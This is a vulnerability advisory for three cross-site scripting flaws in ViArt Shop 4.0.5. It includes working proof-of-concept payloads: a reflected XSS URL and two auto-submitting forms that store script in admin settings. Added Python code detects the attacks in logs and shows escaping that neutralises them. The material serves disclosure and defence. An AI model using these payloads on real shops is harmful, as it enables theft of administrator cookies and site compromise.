ViArt Shop version 4.0.5 suffers from multiple cross site scripting vulnerabilities.
====================================
Vulnerability ID: HTB22814
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_viart_shop.html
Product: ViArt Shop
Vendor: Viart Software ( http://www.viart.com/ )
Vulnerable Version: Enterprise v.4.0.5
Vendor Notification: 25 January 2011
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists because the "/admin/admin_product.php" script fails to properly sanitize user-supplied input in the "item_id" variable. Successful exploitation of this vulnerability could result in compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
http://host/admin/admin_product.php?category_id=0&item_id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
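Because the issue is listed as not fixed, requests carrying a non-numeric "item_id" to this script are worth flagging in web server logs. The following is an added example, not part of the original advisory or of ViArt's code: the log lines are constructed, the function name is hypothetical, and it assumes "item_id" is always a plain decimal identifier in legitimate use.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); addresses are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2011:10:00:01 +0000] '
    '"GET /admin/admin_product.php?category_id=0&item_id=17 HTTP/1.1" 200 5120',
    # Request line taken from the PoC URL above.
    '192.0.2.44 - - [01/Feb/2011:10:02:13 +0000] '
    '"GET /admin/admin_product.php?category_id=0&item_id=1%22%3E%3Cscript%3E'
    'alert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 5342',
    # Different script with a similar name: must not match.
    '192.0.2.10 - - [01/Feb/2011:10:03:40 +0000] '
    '"GET /admin/admin_products.php?category_id=0 HTTP/1.1" 200 8841',
    # Shop installed in a subdirectory, malformed identifier.
    '192.0.2.51 - - [01/Feb/2011:10:05:02 +0000] '
    '"GET /shop/admin/admin_product.php?item_id=12abc HTTP/1.1" 200 5300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # assumption: ids are short decimal numbers


def suspicious_item_id_requests(lines):
    """Return (client_ip, decoded_item_id) for every request to
    admin_product.php whose item_id is not a plain decimal number."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/admin/admin_product.php"):
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared
        # in the form the application would actually receive.
        for value in parse_qs(url.query).get("item_id", []):
            if not NUMERIC_ID.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_item_id_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric item_id: {value!r}")
```

The same numeric check, applied before the value is used in the page, rejects the PoC request outright.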
====================================
Vulnerability ID: HTB22815
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_viart_shop_1.html
Product: ViArt Shop
Vendor: Viart Software ( http://www.viart.com/ )
Vulnerable Version: Enterprise v.4.0.5
Vendor Notification: 25 January 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists because the "/admin/admin_global_settings.php" script fails to properly sanitize user-supplied input in the "html_below_footer" variable. Successful exploitation of this vulnerability could result in compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/admin_global_settings.php" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="rp" value="admin.php">
<input type="hidden" name="tab" value="general">
<input type="hidden" name="site_name" value="Default Site">
<input type="hidden" name="site_url" value="http://host/">
<input type="hidden" name="admin_email" value="email@example.com">
<input type="hidden" name="layout_id" value="1">
<input type="hidden" name="password_encrypt" value="0">
<input type="hidden" name="admin_password_encrypt" value="0">
<input type="hidden" name="html_below_footer" value='12345"><script>alert(document.cookie)</script>'>
<input type="hidden" name="operation" value="save">
</form>
<script>
document.main.submit();
</script>
====================================
Vulnerability ID: HTB22816
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_viart_shop_2.html
Product: ViArt Shop
Vendor: Viart Software ( http://www.viart.com/ )
Vulnerable Version: Enterprise v.4.0.5
Vendor Notification: 25 January 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists because the "/admin/admin_manufacturer.php" script fails to properly sanitize user-supplied input in the "manufacturer_name" variable. Successful exploitation of this vulnerability could result in compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/admin_manufacturer.php" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="manufacturer_id" value="3">
<input type="hidden" name="manufacturer_name" value='Company"><script>alert(document.cookie)</script>'>
<input type="hidden" name="manufacturer_order" value="1">
<input type="hidden" name="friendly_url" value="">
<input type="hidden" name="affiliate_code" value="">
<input type="hidden" name="short_description" value="">
<input type="hidden" name="full_description" value="">
<input type="hidden" name="image_small" value="images/manufacturers/small/company.gif">
<input type="hidden" name="image_small_alt" value="company">
<input type="hidden" name="image_large" value="images/manufacturers/large/company.gif">
<input type="hidden" name="image_large_alt" value="company">
</form>
<script>
document.main.submit();
</script>
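
Both stored-XSS PoC values above (HTB22815 and HTB22816) start with `">`, which closes a double-quoted attribute and its tag. The following added example, which is not ViArt's code and not from the original advisory, parses the markup a template would produce with and without output encoding; the two render functions are hypothetical and assume the stored value is echoed into a double-quoted "value" attribute.

```python
from html import escape
from html.parser import HTMLParser

# Values copied from the two stored-XSS PoC forms in this advisory.
POC_VALUES = {
    "html_below_footer": '12345"><script>alert(document.cookie)</script>',
    "manufacturer_name": 'Company"><script>alert(document.cookie)</script>',
}


class TagAudit(HTMLParser):
    """Records every start tag and the input's value attribute as parsed."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")


def render_raw(name, stored):
    # Hypothetical vulnerable template: stored text concatenated as-is.
    return f'<input type="text" name="{name}" value="{stored}">'


def render_escaped(name, stored):
    # Hardened template: &, <, > and both quote characters become entities.
    return f'<input type="text" name="{name}" value="{escape(stored, quote=True)}">'


def audit(markup):
    """Return (list of start tags, parsed value attribute) for the markup."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.value


if __name__ == "__main__":
    for field, stored in POC_VALUES.items():
        print(field, "raw:    ", audit(render_raw(field, stored)))
        print(field, "escaped:", audit(render_escaped(field, stored)))
```

With the raw template the parser sees a separate script element and a truncated value; with encoding it sees a single input whose value is the full stored string.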